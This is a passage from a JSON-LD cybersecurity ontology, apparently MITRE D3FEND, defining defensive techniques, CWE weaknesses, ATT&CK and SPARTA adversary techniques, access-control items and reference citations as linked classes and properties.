      "d3f:kb-article": "## References\nNewcastle University. (n.d.). Parametric Hypothesis Tests. [Link](https://www.ncl.ac.uk/webtemplate/ask-assets/external/maths-resources/psychology/non-parametric-hypothesis-tests.html)",
      "rdfs:label": "Non-Parametric Tests",
      "rdfs:subClassOf": {
        "@id": "d3f:HypothesisTesting"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForStrategicAntiMalwareMonitoring",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/d9/02/31/3a28fefc73661d/US20230362189A1.pdf"
      },
      "d3f:kb-abstract": "The system and method described herein may leverage active network scanning and passive network monitoring to provide strategic anti-malware monitoring in a network. In particular, the system and method described herein may remotely connect to managed hosts in a network to compute hashes or other signatures associated with processes running thereon and suspicious files hosted thereon, wherein the hashes may communicated to a cloud database that aggregates all known virus or malware signatures that various anti-virus vendors have catalogued to detect malware infections without requiring the hosts to have a local or resident anti-virus agent. Furthermore, running processes and file system activity may be monitored in the network to further detect malware infections. Additionally, the network scanning and network monitoring may be used to detect hosts that may potentially be participating in an active botnet or hosting botnet content and audit anti-virus strategies deployed in the network.",
      "d3f:kb-author": "Marcus J. Ranum, Ron Gula",
      "d3f:kb-organization": "Tenable Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkTrafficSignatureAnalysis"
      },
      "d3f:kb-reference-title": "System and method for strategic anti-malware monitoring",
      "rdfs:label": "Reference - System and method for strategic anti-malware monitoring - Tenable"
    },
    {
      "@id": "d3f:validates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x validates y: The technique x proves the digital artifact y is valid; that is, x shows or confirms the validity of y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00669142-v"
      },
      "rdfs:label": "validates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:Weakness",
      "@type": "owl:Class",
      "d3f:definition": "A weakness is a condition in a software, firmware, hardware, or service component that, under certain circumstances, could contribute to the introduction of vulnerabilities.",
      "rdfs:label": "Weakness",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:HeterogeneousTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HTL",
      "d3f:definition": "Heterogeneous transfer learning is characterized by the source and target domains having differing feature spaces, but may also be combined with other issues such as differing data distributions and label spaces.",
      "d3f:kb-article": "## References\nWang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Heterogeneous Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:TransferLearning"
      }
    },
    {
      "@id": "d3f:Command",
      "@type": "owl:Class",
      "d3f:definition": "A directive (i.e., an instruction specifying a procedure) which, when issued to a computer system, software, or hardware component, causes that entity to execute a specific action, operation, or computation.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Command_(computing)"
      },
      "rdfs:label": "Command",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:IPPhone",
      "@type": "owl:Class",
      "d3f:definition": "A VoIP phone or IP phone uses voice over IP technologies for placing and transmitting telephone calls over an IP network, such as the Internet, instead of the traditional public switched telephone network (PSTN). Digital IP-based telephone service uses control protocols such as the Session Initiation Protocol (SIP), Skinny Client Control Protocol (SCCP) or various other proprietary protocols.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:VoIP_phone"
      },
      "rdfs:label": "IP Phone",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": "VoIP Phone"
    },
    {
      "@id": "d3f:SystemMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemMapping"
      ],
      "d3f:d3fend-id": "D3-SYSM",
      "d3f:definition": "System mapping encompasses the techniques to identify the organization's systems, how they are configured and decomposed into subsystems and components, how they are dependent on one another, and where they are physically located.",
      "d3f:display-order": 2,
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "rdfs:label": "System Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N9b9b98e7a4b74e0bbddf36dc82a77611"
        }
      ]
    },
    {
      "@id": "_:N9b9b98e7a4b74e0bbddf36dc82a77611",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:may-detect",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may detect",
      "rdfs:label": "may-detect",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
      "@id": "d3f:CWE-291",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-291",
      "d3f:definition": "The product uses an IP address for authentication.",
      "rdfs:label": "Reliance on IP Address for Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-290"
        },
        {
          "@id": "d3f:CWE-471"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:suspends",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x suspends y: The agent or technique x pauses entity y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00543748-v"
      },
      "rdfs:label": "suspends",
      "rdfs:subPropertyOf": {
        "@id": "d3f:evicts"
      }
    },
    {
      "@id": "d3f:enables",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enables y: A top level technique x enables a tactic y, that is, the property indicates that a technique x is used to put a particular tactic y into action. In other words, x renders y capable or able for some task.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00513958-v"
      },
      "rdfs:label": "enables",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:RD-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005",
      "d3f:definition": "Adversaries may pursue non-cyber counterspace means to create access, leverage, or effects that complement cyber operations. These capabilities span kinetic physical (e.g., direct-ascent or co-orbital interceptors and attacks on ground segments), non-kinetic physical (e.g., lasers, high-power microwave/EMP), and electronic warfare (jamming and spoofing). Each class differs in required resources, detectability, attribution, and the permanence of effects, from reversible interference to irreversible destruction. A pragmatic actor mixes methods: electronic attack to mask or distract, directed energy to blind sensors or upset electronics, and, at the top end, kinetic capabilities to hold assets at risk. Resource development may involve acquisition, partnering, or covert access to such systems; rehearsals are often framed as testing or calibration.",
      "rdfs:label": "Obtain Non-Cyber Capabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Obtain Non-Cyber Capabilities"
    },
    {
      "@id": "d3f:ATLASResourceDevelopmentTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0003"
      },
      "rdfs:label": "Resource Development Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N88069147d0494d2ab72f8902f4b4826b"
        }
      ],
      "skos:prefLabel": "Resource Development Technique"
    },
    {
      "@id": "_:N88069147d0494d2ab72f8902f4b4826b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0003"
      }
    },
    {
      "@id": "d3f:executes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x executes y: The subject x takes the action of carrying out (executing) y, which is a single software module, function, or instruction.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02569242-v"
      },
      "rdfs:label": "executes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:accesses"
        },
        {
          "@id": "d3f:may-execute"
        },
        {
          "@id": "d3f:runs"
        }
      ]
    },
    {
      "@id": "d3f:ATLASAIAttackStagingTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0001"
      },
      "rdfs:label": "AI Attack Staging Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N04f4a09e400c4a0db758a53488334a04"
        }
      ],
      "skos:prefLabel": "AI Attack Staging Technique"
    },
    {
      "@id": "_:N04f4a09e400c4a0db758a53488334a04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0001"
      }
    },
    {
      "@id": "d3f:CWE-172",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-172",
      "d3f:definition": "The product does not properly encode or decode the data, resulting in unexpected values.",
      "rdfs:label": "Encoding Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:AccessModeling",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AccessModeling"
      ],
      "d3f:d3fend-id": "D3-AM",
      "d3f:definition": "Access modeling captures and records the access permissions granted to identities (e.g., administrators, users, groups, systems) and optionally includes details on how these identities are stored, managed, and shared across systems.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-RFC7642SystemForCrossDomainIdentityManagementDefinitionsOverviewConceptsAndRequirements"
      },
      "d3f:maps": [
        {
          "@id": "d3f:AccessControlConfiguration"
        },
        {
          "@id": "d3f:DigitalIdentity"
        },
        {
          "@id": "d3f:UserAccount"
        }
      ],
      "rdfs:label": "Access Modeling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:N30a1152747b8452592d7d41f4fe9e64c"
        },
        {
          "@id": "_:N75ee0c18659040e7972b31c6dffeb815"
        },
        {
          "@id": "_:N3f5cc846ff134ca8b326595f64e61d60"
        }
      ]
    },
    {
      "@id": "_:N30a1152747b8452592d7d41f4fe9e64c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:N75ee0c18659040e7972b31c6dffeb815",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalIdentity"
      }
    },
    {
      "@id": "_:N3f5cc846ff134ca8b326595f64e61d60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:WindowsNtCreatePagingFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Typically used by Control Panel's \"System\" applet for creating new paged files.",
      "rdfs:label": "Windows NtCreatePagingFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:T0806",
      "@type": "owl:Class",
      "d3f:attack-id": "T0806",
      "d3f:definition": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point.",
      "rdfs:label": "Brute Force I/O - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
      },
      "skos:prefLabel": "Brute Force I/O"
    },
    {
      "@id": "d3f:AccessProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Access Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ne3be9777cca04e67b1201514c1438621"
        }
      ]
    },
    {
      "@id": "_:Ne3be9777cca04e67b1201514c1438621",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:T1653",
      "@type": "owl:Class",
      "d3f:attack-id": "T1653",
      "d3f:definition": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)",
      "rdfs:label": "Power Settings",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:Software-definedRadioDevice",
      "@type": "owl:Class",
      "d3f:definition": "A hardware device that functions primarily as an RF front end plus data conversion and transport, relying on an external host computer to run most waveform/DSP processing and to control operation. It is commonly connected via USB, PCIe, or similar links and behaves like a high-speed radio peripheral.",
      "d3f:synonym": "Peripheral SDR",
      "rdfs:label": "Software-Defined Radio Device",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Software-defined_radio#RTL-SDR"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:CWE-1053",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1053",
      "d3f:definition": "The product does not have documentation that represents how it is designed.",
      "rdfs:label": "Missing Documentation for Design",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:CWE-1326",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1326",
      "d3f:definition": "A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code.",
      "rdfs:label": "Missing Immutable Root of Trust in Hardware",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:SystemFirmwareVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemFirmwareVerification"
      ],
      "d3f:d3fend-id": "D3-SFV",
      "d3f:definition": "Cryptographically verifying installed system firmware integrity.",
      "d3f:kb-article": "## How it works\nCryptographic hash values are computed for system firmware. The hash values are compared against precomputed firmware hash values to determine if the firmware has been tampered with.\n\nWhen system firmware verification fails a set of predefined responses is typically invoked. The responses may direct the system to disable some devices or operations.\n\n## Considerations\n* Requires the use of system provided security modules\n* Secure hash values will need to be computed for firmware",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareVerificationEclypsium"
        },
        {
          "@id": "d3f:Reference-PlatformFirmwareResiliencyGuidelines_NIST"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:SystemFirmware"
      },
      "rdfs:label": "System Firmware Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "_:Nd6a55dab5a31467a8507f344fd0cebef"
        }
      ]
    },
    {
      "@id": "_:Nd6a55dab5a31467a8507f344fd0cebef",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:T1021.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.002",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.",
      "rdfs:label": "SMB/Windows Admin Shares",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:CCI-000386_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to prevent program execution on the information system in accordance with the organization-defined specifications.",
      "d3f:exactly": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000386"
    },
    {
      "@id": "d3f:T1430",
      "@type": "owl:Class",
      "d3f:attack-id": "T1430",
      "d3f:definition": "Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device.",
      "rdfs:label": "Location Tracking - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileDiscoveryTechnique"
        }
      ],
      "skos:prefLabel": "Location Tracking"
    },
    {
      "@id": "d3f:spoofs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x spoofs y: The technique x creates a fake instance of a digital artifact y; that is, y is a decoy, fake, or counterfeit.",
      "rdfs:label": "spoofs",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Spoof"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/03323383-n"
        }
      ],
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:deceives-with"
        }
      ]
    },
    {
      "@id": "d3f:T1028",
      "@type": "owl:Class",
      "d3f:attack-id": "T1028",
      "d3f:definition": "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1021.006",
      "rdfs:label": "Windows Remote Management",
      "rdfs:seeAlso": {
        "@id": "d3f:T1021.006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:mapped-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x mapped-by y: The entity x is linked to another entity by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:maps"
      },
      "rdfs:label": "mapped-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CCI-001813_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces access restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-01T00:00:00"
      },
      "rdfs:label": "CCI-001813"
    },
    {
      "@id": "d3f:T1071.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.003",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetMailTraffic"
      },
      "rdfs:label": "Mail Protocols",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:N8b2137241fa94f08996fbe85b432c405"
        }
      ]
    },
    {
      "@id": "_:N8b2137241fa94f08996fbe85b432c405",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetMailTraffic"
      }
    },
    {
      "@id": "d3f:OTControlCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Command and control the managed process.",
      "rdfs:label": "OT Control Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessDataCommandEvent"
        },
        {
          "@id": "_:N15f674b720234b20ab0d18bfc41983c2"
        }
      ]
    },
    {
      "@id": "_:N15f674b720234b20ab0d18bfc41983c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlCommand"
      }
    },
    {
      "@id": "d3f:T1645",
      "@type": "owl:Class",
      "d3f:attack-id": "T1645",
      "d3f:definition": "Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators.",
      "rdfs:label": "Compromise Client Software Binary - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Compromise Client Software Binary"
    },
    {
      "@id": "d3f:T1021.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.007",
      "d3f:definition": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user.",
      "rdfs:label": "Cloud Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:Reference-HowASLRProtectsLinuxSystemsFromBufferOverflowAttacks_NetworkWorld",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.networkworld.com/article/3331199/what-does-aslr-do-for-linux.html"
      },
      "d3f:kb-abstract": "ASLR (Address Space Layout Randomization) is a memory exploitation mitigation technique used on both Linux and Windows systems. Learn how to tell if it's running, enable/disable it, and get a view of how it works.",
      "d3f:kb-author": "Sandra Henry-Stocker",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Network World",
      "d3f:kb-reference-of": {
        "@id": "d3f:SegmentAddressOffsetRandomization"
      },
      "d3f:kb-reference-title": "How ASLR protects Linux systems from buffer overflow attacks",
      "rdfs:label": "Reference - How ASLR protects Linux systems from buffer overflow attacks - Network World"
    },
    {
      "@id": "d3f:DigitalMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A discrete unit of digital communication created by a sender for one or more intended recipients. Encoded in an application-layer format, a digital message conveys semantics such as commands, data, or status and is transported inside lower-layer containers like network frames or packets.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Message_(computing)"
      },
      "rdfs:label": "Digital Message",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CWE-943",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-943",
      "d3f:definition": "The product generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.",
      "d3f:synonym": "NoSQL Injection, NoSQLi",
      "rdfs:label": "Improper Neutralization of Special Elements in Data Query Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:WindowsReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads data from the specified file or input/output (I/O) device. Reads occur at the position specified by the file pointer if supported by the device.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtReadFile"
        },
        {
          "@id": "d3f:WindowsNtReadFileScatter"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile"
      },
      "rdfs:label": "Windows ReadFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIReadFile"
        },
        {
          "@id": "_:Nad5423352db54fdc876cbe83d737955a"
        },
        {
          "@id": "_:N274761ad9f674cd7b79b4c2b8b937021"
        }
      ]
    },
    {
      "@id": "_:Nad5423352db54fdc876cbe83d737955a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtReadFile"
      }
    },
    {
      "@id": "_:N274761ad9f674cd7b79b4c2b8b937021",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtReadFileScatter"
      }
    },
    {
      "@id": "d3f:CWE-1334",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1334",
      "d3f:definition": "An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode.",
      "rdfs:label": "Unauthorized Error Injection Can Degrade Hardware Redundancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "_:Nfd390917e9d04cb9912ddbfe4b84494a",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:GeometricMean"
          },
          {
            "@id": "d3f:HarmonicMean"
          },
          {
            "@id": "d3f:Mean"
          },
          {
            "@id": "d3f:Median"
          },
          {
            "@id": "d3f:Mode"
          },
          {
            "@id": "d3f:TrimmedMean"
          },
          {
            "@id": "d3f:WeightedMean"
          }
        ]
      }
    },
    {
      "@id": "d3f:PredicateLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PL",
      "d3f:definition": "Predicate logic is is collection of formal systems used in mathematics, philosophy, linguistics, and computer science. First-order logic and Higher-order logic both incorporate predicate logic.",
      "d3f:kb-article": "## References\n1. First-order logic. (2023, May 26). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/First-order_logic)\n2. Higher-order logic. (2023, May 13)\n[Link](https://en.wikipedia.org/wiki/Higher-order_logic)",
      "rdfs:label": "Predicate Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T1050",
      "@type": "owl:Class",
      "d3f:attack-id": "T1050",
      "d3f:definition": "When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.003",
      "rdfs:label": "New Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1638",
      "@type": "owl:Class",
      "d3f:attack-id": "T1638",
      "d3f:definition": "Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642).",
      "rdfs:label": "Adversary-in-the-Middle - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Adversary-in-the-Middle"
    },
    {
      "@id": "d3f:T1164",
      "@type": "owl:Class",
      "d3f:attack-id": "T1164",
      "d3f:definition": "Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.007",
      "rdfs:label": "Re-opened Applications",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.007"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002169_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces a role-based access control policy over defined subjects and objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002169"
    },
    {
      "@id": "d3f:RevokePrivilegesFromGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where specific privileges or rights are removed from a group, restricting its members from performing actions or accessing resources previously allowed by those privileges.",
      "rdfs:label": "Revoke Privileges from Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "d3f:PermissionRevokingEvent"
        },
        {
          "@id": "_:Nad7bf289b3dd46dc94419f0c8bf089e1"
        }
      ]
    },
    {
      "@id": "_:Nad7bf289b3dd46dc94419f0c8bf089e1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AssignPrivilegesToGroupEvent"
      }
    },
    {
      "@id": "d3f:T1567",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1567",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
